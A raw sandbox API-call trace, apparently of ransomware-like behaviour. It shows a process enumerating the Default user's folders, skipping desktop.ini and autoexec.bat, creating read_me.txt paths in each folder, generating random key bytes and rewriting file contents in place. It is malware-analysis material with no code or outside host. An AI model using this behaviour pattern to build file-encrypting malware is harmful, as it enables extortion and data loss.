nFileSizeLow=0x19c, dwReserved0=0x7d778b0, dwReserved1=0x4f10000, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0083.076] wnsprintfW (in: pszDest=0x8c20008, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\Default\\Contacts\\desktop.ini") returned 41 [0083.076] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\Contacts\\desktop.ini" (normalized: "c:\\users\\default\\contacts\\desktop.ini"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x8ec [0083.076] StrStrW (lpFirst="desktop.ini", lpSrch="read_me.txt") returned 0x0 [0083.076] StrStrW (lpFirst="desktop.ini", lpSrch="autoexec.bat") returned 0x0 [0083.076] StrStrW (lpFirst="desktop.ini", lpSrch="desktop.ini") returned="desktop.ini" [0083.076] CloseHandle (hObject=0x8ec) returned 1 [0083.076] FindNextFileW (in: hFindFile=0x7cfe768, lpFindFileData=0x84afb60 | out: lpFindFileData=0x84afb60*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x24e61ae0, ftCreationTime.dwHighDateTime=0x1d5a041, ftLastAccessTime.dwLowDateTime=0x24e61ae0, ftLastAccessTime.dwHighDateTime=0x1d5a041, ftLastWriteTime.dwLowDateTime=0x24e61ae0, ftLastWriteTime.dwHighDateTime=0x1d5a041, nFileSizeHigh=0x0, nFileSizeLow=0x6b3, dwReserved0=0x7d778b0, dwReserved1=0x4f10000, cFileName="read_me.txt", cAlternateFileName="")) returned 1 [0083.076] wnsprintfW (in: pszDest=0x8c20008, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\Default\\Contacts\\read_me.txt") returned 41 [0083.076] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\Contacts\\read_me.txt" (normalized: "c:\\users\\default\\contacts\\read_me.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x8ec [0083.077] StrStrW (lpFirst="read_me.txt", lpSrch="read_me.txt") returned="read_me.txt" [0083.077] CloseHandle (hObject=0x8ec) returned 1 [0083.077] FindNextFileW (in: hFindFile=0x7cfe768, lpFindFileData=0x84afb60 | out: lpFindFileData=0x84afb60*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x24e61ae0, ftCreationTime.dwHighDateTime=0x1d5a041, ftLastAccessTime.dwLowDateTime=0x24e61ae0, ftLastAccessTime.dwHighDateTime=0x1d5a041, ftLastWriteTime.dwLowDateTime=0x24e61ae0, ftLastWriteTime.dwHighDateTime=0x1d5a041, nFileSizeHigh=0x0, nFileSizeLow=0x6b3, dwReserved0=0x7d778b0, dwReserved1=0x4f10000, cFileName="read_me.txt", cAlternateFileName="")) returned 0 [0083.077] FindClose (in: hFindFile=0x7cfe768 | out: hFindFile=0x7cfe768) returned 1 [0083.077] wnsprintfW (in: pszDest=0x8c20008, cchDest=32767, pszFmt="%s\\read_me.txt" | out: pszDest="\\\\?\\C:\\Users\\Default\\Contacts\\read_me.txt") returned 41 [0083.077] GetProcessHeap () returned 0x4f10000 [0083.077] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x8c20008 | out: hHeap=0x4f10000) returned 1 [0083.077] InterlockedExchangeAdd (in: Addend=0x40f16c, Value=1 | out: Addend=0x40f16c) returned 96 [0083.077] GetProcessHeap () returned 0x4f10000 [0083.077] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x8a90050 | out: hHeap=0x4f10000) returned 1 [0083.112] GetProcessHeap () returned 0x4f10000 [0083.112] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x8, Size=0xfffe) returned 0x8c20008 [0083.113] wnsprintfW (in: pszDest=0x8c20008, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\Default\\Cookies\\*") returned 30 [0083.113] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\Default\\Cookies\\*", lpFindFileData=0x84afb60 | out: lpFindFileData=0x84afb60*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x24e61ae0, ftCreationTime.dwHighDateTime=0x1d5a041, ftLastAccessTime.dwLowDateTime=0x24e61ae0, ftLastAccessTime.dwHighDateTime=0x1d5a041, ftLastWriteTime.dwLowDateTime=0x24e61ae0, ftLastWriteTime.dwHighDateTime=0x1d5a041, nFileSizeHigh=0x0, nFileSizeLow=0x6b3, dwReserved0=0x7d778b0, dwReserved1=0x4f10000, cFileName="read_me.txt", cAlternateFileName="")) returned 0xffffffff [0083.114] wnsprintfW (in: pszDest=0x8c20008, cchDest=32767, pszFmt="%s\\read_me.txt" | out: pszDest="\\\\?\\C:\\Users\\Default\\Cookies\\read_me.txt") returned 40 [0083.114] GetProcessHeap () returned 0x4f10000 [0083.114] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x8c20008 | out: hHeap=0x4f10000) returned 1 [0083.114] InterlockedExchangeAdd (in: Addend=0x40f16c, Value=1 | out: Addend=0x40f16c) returned 97 [0083.114] GetProcessHeap () returned 0x4f10000 [0083.114] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x8ab0060 | out: hHeap=0x4f10000) returned 1 [0083.115] GetProcessHeap () returned 0x4f10000 [0083.115] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x8, Size=0xfffe) returned 0x8c20008 [0083.115] wnsprintfW (in: pszDest=0x8c20008, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\Default\\Desktop\\*") returned 30 [0083.115] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\Default\\Desktop\\*", lpFindFileData=0x84afb60 | out: lpFindFileData=0x84afb60*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfda4e0ba, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x24e87c40, ftLastAccessTime.dwHighDateTime=0x1d5a041, ftLastWriteTime.dwLowDateTime=0x24e87c40, ftLastWriteTime.dwHighDateTime=0x1d5a041, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x7d778b0, dwReserved1=0x4f10000, cFileName=".", cAlternateFileName="")) returned 0x7cfe768 [0083.116] wnsprintfW (in: pszDest=0x8c20008, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\Default\\Desktop\\.") returned 30 [0083.116] FindNextFileW (in: hFindFile=0x7cfe768, lpFindFileData=0x84afb60 | out: lpFindFileData=0x84afb60*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfda4e0ba, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x24e87c40, ftLastAccessTime.dwHighDateTime=0x1d5a041, ftLastWriteTime.dwLowDateTime=0x24e87c40, ftLastWriteTime.dwHighDateTime=0x1d5a041, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x7d778b0, dwReserved1=0x4f10000, cFileName="..", cAlternateFileName="")) returned 1 [0083.116] wnsprintfW (in: pszDest=0x8c20008, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\Default\\Desktop\\..") returned 31 [0083.116] FindNextFileW (in: hFindFile=0x7cfe768, lpFindFileData=0x84afb60 | out: lpFindFileData=0x84afb60*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x636c8c0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x636c8c0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xd8868f0a, ftLastWriteTime.dwHighDateTime=0x1cb892d, nFileSizeHigh=0x0, nFileSizeLow=0x11a, dwReserved0=0x7d778b0, dwReserved1=0x4f10000, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0083.116] wnsprintfW (in: pszDest=0x8c20008, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\Default\\Desktop\\desktop.ini") returned 40 [0083.116] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\Desktop\\desktop.ini" (normalized: "c:\\users\\default\\desktop\\desktop.ini"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x8f4 [0083.120] StrStrW (lpFirst="desktop.ini", lpSrch="read_me.txt") returned 0x0 [0083.120] StrStrW (lpFirst="desktop.ini", lpSrch="autoexec.bat") returned 0x0 [0083.120] StrStrW (lpFirst="desktop.ini", lpSrch="desktop.ini") returned="desktop.ini" [0083.120] CloseHandle (hObject=0x8f4) returned 1 [0083.120] FindNextFileW (in: hFindFile=0x7cfe768, lpFindFileData=0x84afb60 | out: lpFindFileData=0x84afb60*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x24e87c40, ftCreationTime.dwHighDateTime=0x1d5a041, ftLastAccessTime.dwLowDateTime=0x24e87c40, ftLastAccessTime.dwHighDateTime=0x1d5a041, ftLastWriteTime.dwLowDateTime=0x24e87c40, ftLastWriteTime.dwHighDateTime=0x1d5a041, nFileSizeHigh=0x0, nFileSizeLow=0x6b3, dwReserved0=0x7d778b0, dwReserved1=0x4f10000, cFileName="read_me.txt", cAlternateFileName="")) returned 1 [0083.120] wnsprintfW (in: pszDest=0x8c20008, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\Default\\Desktop\\read_me.txt") returned 40 [0083.120] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\Desktop\\read_me.txt" (normalized: "c:\\users\\default\\desktop\\read_me.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x8f4 [0083.120] StrStrW (lpFirst="read_me.txt", lpSrch="read_me.txt") returned="read_me.txt" [0083.120] CloseHandle (hObject=0x8f4) returned 1 [0083.120] FindNextFileW (in: hFindFile=0x7cfe768, lpFindFileData=0x84afb60 | out: lpFindFileData=0x84afb60*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x24e87c40, ftCreationTime.dwHighDateTime=0x1d5a041, ftLastAccessTime.dwLowDateTime=0x24e87c40, ftLastAccessTime.dwHighDateTime=0x1d5a041, ftLastWriteTime.dwLowDateTime=0x24e87c40, ftLastWriteTime.dwHighDateTime=0x1d5a041, nFileSizeHigh=0x0, nFileSizeLow=0x6b3, dwReserved0=0x7d778b0, dwReserved1=0x4f10000, cFileName="read_me.txt", cAlternateFileName="")) returned 0 [0083.121] FindClose (in: hFindFile=0x7cfe768 | out: hFindFile=0x7cfe768) returned 1 [0083.121] wnsprintfW (in: pszDest=0x8c20008, cchDest=32767, pszFmt="%s\\read_me.txt" | out: pszDest="\\\\?\\C:\\Users\\Default\\Desktop\\read_me.txt") returned 40 [0083.121] GetProcessHeap () returned 0x4f10000 [0083.121] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x8c20008 | out: hHeap=0x4f10000) returned 1 [0083.121] InterlockedExchangeAdd (in: Addend=0x40f16c, Value=1 | out: Addend=0x40f16c) returned 98 [0083.121] GetProcessHeap () returned 0x4f10000 [0083.121] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x8df1108 | out: hHeap=0x4f10000) returned 1 [0083.121] GetProcessHeap () returned 0x4f10000 [0083.122] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x8, Size=0xfffe) returned 0x8c20008 [0083.122] wnsprintfW (in: pszDest=0x8c20008, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\Default\\Documents\\*") returned 32 [0083.122] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\Default\\Documents\\*", lpFindFileData=0x84afb60 | out: lpFindFileData=0x84afb60*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfda9a36e, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x24ed3f00, ftLastAccessTime.dwHighDateTime=0x1d5a041, ftLastWriteTime.dwLowDateTime=0x24ed3f00, ftLastWriteTime.dwHighDateTime=0x1d5a041, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x7d778b0, dwReserved1=0x4f10000, cFileName=".", cAlternateFileName="")) returned 0x7cfe768 [0083.122] wnsprintfW (in: pszDest=0x8c20008, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\Default\\Documents\\.") returned 32 [0083.122] FindNextFileW (in: hFindFile=0x7cfe768, lpFindFileData=0x84afb60 | out: lpFindFileData=0x84afb60*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfda9a36e, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x24ed3f00, ftLastAccessTime.dwHighDateTime=0x1d5a041, ftLastWriteTime.dwLowDateTime=0x24ed3f00, ftLastWriteTime.dwHighDateTime=0x1d5a041, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x7d778b0, dwReserved1=0x4f10000, cFileName="..", cAlternateFileName="")) returned 1 [0083.122] wnsprintfW (in: pszDest=0x8c20008, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\Default\\Documents\\..") returned 33 [0083.122] FindNextFileW (in: hFindFile=0x7cfe768, lpFindFileData=0x84afb60 | out: lpFindFileData=0x84afb60*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x636c8c0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x636c8c0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xd890148c, ftLastWriteTime.dwHighDateTime=0x1cb892d, nFileSizeHigh=0x0, nFileSizeLow=0x192, dwReserved0=0x7d778b0, dwReserved1=0x4f10000, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0083.122] wnsprintfW (in: pszDest=0x8c20008, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\Default\\Documents\\desktop.ini") returned 42 [0083.122] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\Documents\\desktop.ini" (normalized: "c:\\users\\default\\documents\\desktop.ini"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x8f4 [0083.122] StrStrW (lpFirst="desktop.ini", lpSrch="read_me.txt") returned 0x0 [0083.122] StrStrW (lpFirst="desktop.ini", lpSrch="autoexec.bat") returned 0x0 [0083.122] StrStrW (lpFirst="desktop.ini", lpSrch="desktop.ini") returned="desktop.ini" [0083.122] CloseHandle (hObject=0x8f4) returned 1 [0083.122] FindNextFileW (in: hFindFile=0x7cfe768, lpFindFileData=0x84afb60 | out: lpFindFileData=0x84afb60*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x306b6cd1, ftCreationTime.dwHighDateTime=0x1ca0441, ftLastAccessTime.dwLowDateTime=0x306b6cd1, ftLastAccessTime.dwHighDateTime=0x1ca0441, ftLastWriteTime.dwLowDateTime=0x306b6cd1, ftLastWriteTime.dwHighDateTime=0x1ca0441, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x4f10000, cFileName="My Music", cAlternateFileName="MYMUSI~1")) returned 1 [0083.122] wnsprintfW (in: pszDest=0x8c20008, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\Default\\Documents\\My Music") returned 39 [0083.122] FindNextFileW (in: hFindFile=0x7cfe768, lpFindFileData=0x84afb60 | out: lpFindFileData=0x84afb60*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x306b6cd1, ftCreationTime.dwHighDateTime=0x1ca0441, ftLastAccessTime.dwLowDateTime=0x306b6cd1, ftLastAccessTime.dwHighDateTime=0x1ca0441, ftLastWriteTime.dwLowDateTime=0x306b6cd1, ftLastWriteTime.dwHighDateTime=0x1ca0441, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x4f10000, cFileName="My Pictures", cAlternateFileName="MYPICT~1")) returned 1 [0083.122] wnsprintfW (in: pszDest=0x8c20008, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\Default\\Documents\\My Pictures") returned 42 [0083.123] FindNextFileW (in: hFindFile=0x7cfe768, lpFindFileData=0x84afb60 | out: lpFindFileData=0x84afb60*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x306b6cd1, ftCreationTime.dwHighDateTime=0x1ca0441, ftLastAccessTime.dwLowDateTime=0x306b6cd1, ftLastAccessTime.dwHighDateTime=0x1ca0441, ftLastWriteTime.dwLowDateTime=0x306b6cd1, ftLastWriteTime.dwHighDateTime=0x1ca0441, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x4f10000, cFileName="My Videos", cAlternateFileName="MYVIDE~1")) returned 1 [0083.123] wnsprintfW (in: pszDest=0x8c20008, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\Default\\Documents\\My Videos") returned 40 [0083.123] FindNextFileW (in: hFindFile=0x7cfe768, lpFindFileData=0x84afb60 | out: lpFindFileData=0x84afb60*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x24ed3f00, ftCreationTime.dwHighDateTime=0x1d5a041, ftLastAccessTime.dwLowDateTime=0x24ed3f00, ftLastAccessTime.dwHighDateTime=0x1d5a041, ftLastWriteTime.dwLowDateTime=0x24ed3f00, ftLastWriteTime.dwHighDateTime=0x1d5a041, nFileSizeHigh=0x0, nFileSizeLow=0x6b3, dwReserved0=0xa0000003, dwReserved1=0x4f10000, cFileName="read_me.txt", cAlternateFileName="")) returned 1 [0083.123] wnsprintfW (in: pszDest=0x8c20008, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\Default\\Documents\\read_me.txt") returned 42 [0083.123] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\Documents\\read_me.txt" (normalized: "c:\\users\\default\\documents\\read_me.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x8f4 [0083.123] StrStrW (lpFirst="read_me.txt", lpSrch="read_me.txt") returned="read_me.txt" [0083.123] CloseHandle (hObject=0x8f4) returned 1 [0083.123] FindNextFileW (in: hFindFile=0x7cfe768, lpFindFileData=0x84afb60 | out: lpFindFileData=0x84afb60*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x24ed3f00, ftCreationTime.dwHighDateTime=0x1d5a041, ftLastAccessTime.dwLowDateTime=0x24ed3f00, ftLastAccessTime.dwHighDateTime=0x1d5a041, ftLastWriteTime.dwLowDateTime=0x24ed3f00, ftLastWriteTime.dwHighDateTime=0x1d5a041, nFileSizeHigh=0x0, nFileSizeLow=0x6b3, dwReserved0=0xa0000003, dwReserved1=0x4f10000, cFileName="read_me.txt", cAlternateFileName="")) returned 0 [0083.123] FindClose (in: hFindFile=0x7cfe768 | out: hFindFile=0x7cfe768) returned 1 [0083.123] wnsprintfW (in: pszDest=0x8c20008, cchDest=32767, pszFmt="%s\\read_me.txt" | out: pszDest="\\\\?\\C:\\Users\\Default\\Documents\\read_me.txt") returned 42 [0083.123] GetProcessHeap () returned 0x4f10000 [0083.123] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x8c20008 | out: hHeap=0x4f10000) returned 1 [0083.123] InterlockedExchangeAdd (in: Addend=0x40f16c, Value=1 | out: Addend=0x40f16c) returned 99 [0083.123] GetProcessHeap () returned 0x4f10000 [0083.123] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x8c30010 | out: hHeap=0x4f10000) returned 1 [0083.129] GetProcessHeap () returned 0x4f10000 [0083.129] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x8, Size=0xfffe) returned 0x8b20098 [0083.130] wnsprintfW (in: pszDest=0x8b20098, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\Default\\Documents\\My Music\\*") returned 41 [0083.130] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\Default\\Documents\\My Music\\*", lpFindFileData=0x84afb60 | out: lpFindFileData=0x84afb60*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x24ed3f00, ftCreationTime.dwHighDateTime=0x1d5a041, ftLastAccessTime.dwLowDateTime=0x24ed3f00, ftLastAccessTime.dwHighDateTime=0x1d5a041, ftLastWriteTime.dwLowDateTime=0x24ed3f00, ftLastWriteTime.dwHighDateTime=0x1d5a041, nFileSizeHigh=0x0, nFileSizeLow=0x6b3, dwReserved0=0xa0000003, dwReserved1=0x4f10000, cFileName="read_me.txt", cAlternateFileName="")) returned 0xffffffff [0083.130] wnsprintfW (in: pszDest=0x8b20098, cchDest=32767, pszFmt="%s\\read_me.txt" | out: pszDest="\\\\?\\C:\\Users\\Default\\Documents\\My Music\\read_me.txt") returned 51 [0083.130] GetProcessHeap () returned 0x4f10000 [0083.130] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x8b20098 | out: hHeap=0x4f10000) returned 1 [0083.130] InterlockedExchangeAdd (in: Addend=0x40f16c, Value=1 | out: Addend=0x40f16c) returned 100 [0083.130] GetProcessHeap () returned 0x4f10000 [0083.131] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x8c50020 | out: hHeap=0x4f10000) returned 1 [0083.131] GetProcessHeap () returned 0x4f10000 [0083.131] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x8, Size=0xfffe) returned 0x8c50020 [0083.131] wnsprintfW (in: pszDest=0x8c50020, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\Default\\Documents\\My Pictures\\*") returned 44 [0083.131] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\Default\\Documents\\My Pictures\\*", lpFindFileData=0x84afb60 | out: lpFindFileData=0x84afb60*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x24ed3f00, ftCreationTime.dwHighDateTime=0x1d5a041, ftLastAccessTime.dwLowDateTime=0x24ed3f00, ftLastAccessTime.dwHighDateTime=0x1d5a041, ftLastWriteTime.dwLowDateTime=0x24ed3f00, ftLastWriteTime.dwHighDateTime=0x1d5a041, nFileSizeHigh=0x0, nFileSizeLow=0x6b3, dwReserved0=0xa0000003, dwReserved1=0x4f10000, cFileName="read_me.txt", cAlternateFileName="")) returned 0xffffffff [0083.131] wnsprintfW (in: pszDest=0x8c50020, cchDest=32767, pszFmt="%s\\read_me.txt" | out: pszDest="\\\\?\\C:\\Users\\Default\\Documents\\My Pictures\\read_me.txt") returned 54 [0083.131] GetProcessHeap () returned 0x4f10000 [0083.131] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x8c50020 | out: hHeap=0x4f10000) returned 1 [0083.131] InterlockedExchangeAdd (in: Addend=0x40f16c, Value=1 | out: Addend=0x40f16c) returned 101 [0083.131] GetProcessHeap () returned 0x4f10000 [0083.131] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x8c60028 | out: hHeap=0x4f10000) returned 1 [0083.131] SetFilePointerEx (in: hFile=0x900, liDistanceToMove=0xfffffffc, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0083.131] ReadFile (in: hFile=0x900, lpBuffer=0x84afd4c, nNumberOfBytesToRead=0x4, lpNumberOfBytesRead=0x84afd08, lpOverlapped=0x0 | out: lpBuffer=0x84afd4c*, lpNumberOfBytesRead=0x84afd08*=0x0, lpOverlapped=0x0) returned 1 [0083.131] SetFilePointerEx (in: hFile=0x900, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0083.131] GetProcessHeap () returned 0x4f10000 [0083.131] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x100) returned 0x7d7f770 [0083.131] GetProcessHeap () returned 0x4f10000 [0083.132] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x20) returned 0x7d56870 [0083.132] SystemFunction036 (in: RandomBuffer=0x7d56870, RandomBufferLength=0x20 | out: RandomBuffer=0x7d56870) returned 1 [0083.132] GetProcessHeap () returned 0x4f10000 [0083.132] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x8, Size=0x1000) returned 0x8b610d8 [0083.132] ReadFile (in: hFile=0x900, lpBuffer=0x8b610d8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x84afd08, lpOverlapped=0x0 | out: lpBuffer=0x8b610d8*, lpNumberOfBytesRead=0x84afd08*=0x85, lpOverlapped=0x0) returned 1 [0083.134] SetFilePointerEx (in: hFile=0x900, liDistanceToMove=0xffffff7b, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0083.134] WriteFile (in: hFile=0x900, lpBuffer=0x8b610d8*, nNumberOfBytesToWrite=0x85, lpNumberOfBytesWritten=0x84afd44, lpOverlapped=0x0 | out: lpBuffer=0x8b610d8*, lpNumberOfBytesWritten=0x84afd44*=0x85, lpOverlapped=0x0) returned 1 [0083.134] GetProcessHeap () returned 0x4f10000 [0083.134] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x8, Size=0x4) returned 0x7d12358 [0083.134] GetProcessHeap () returned 0x4f10000 [0083.134] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x8, Size=0x4) returned 0x7d12368 [0083.134] GetProcessHeap () returned 0x4f10000 [0083.134] RtlReAllocateHeap (Heap=0x4f10000, Flags=0x8, Ptr=0x7d12368, Size=0x20) returned 0x7d56528 [0083.134] GetProcessHeap () returned 0x4f10000 [0083.134] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x8, Size=0x4) returned 0x7d12368 [0083.135] GetProcessHeap () returned 0x4f10000 [0083.135] RtlReAllocateHeap (Heap=0x4f10000, Flags=0x0, Ptr=0x7d12368, Size=0x20) returned 0x7d56898 [0083.135] GetProcessHeap () returned 0x4f10000 [0083.135] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x8, Size=0x4) returned 0x7d12368 [0083.135] GetProcessHeap () returned 0x4f10000 [0083.135] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12378 [0083.135] GetProcessHeap () returned 0x4f10000 [0083.135] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12368 | out: hHeap=0x4f10000) returned 1 [0083.135] GetProcessHeap () returned 0x4f10000 [0083.135] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12368 [0083.135] GetProcessHeap () returned 0x4f10000 [0083.135] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12378 | out: hHeap=0x4f10000) returned 1 [0083.135] GetProcessHeap () returned 0x4f10000 [0083.135] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12378 [0083.135] GetProcessHeap () returned 0x4f10000 [0083.135] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12368 | out: hHeap=0x4f10000) returned 1 [0083.135] GetProcessHeap () returned 0x4f10000 [0083.135] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12368 [0083.135] GetProcessHeap () returned 0x4f10000 [0083.135] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12378 | out: hHeap=0x4f10000) returned 1 [0083.135] GetProcessHeap () returned 0x4f10000 [0083.135] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12378 [0083.135] GetProcessHeap () returned 0x4f10000 [0083.135] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12368 | out: hHeap=0x4f10000) returned 1 [0083.135] GetProcessHeap () returned 0x4f10000 [0083.135] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12368 [0083.135] GetProcessHeap () returned 0x4f10000 [0083.135] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12378 | out: hHeap=0x4f10000) returned 1 [0083.135] GetProcessHeap () returned 0x4f10000 [0083.135] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12378 [0083.135] GetProcessHeap () returned 0x4f10000 [0083.135] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12368 | out: hHeap=0x4f10000) returned 1 [0083.135] GetProcessHeap () returned 0x4f10000 [0083.135] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12368 [0083.135] GetProcessHeap () returned 0x4f10000 [0083.135] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12378 | out: hHeap=0x4f10000) returned 1 [0083.135] GetProcessHeap () returned 0x4f10000 [0083.135] 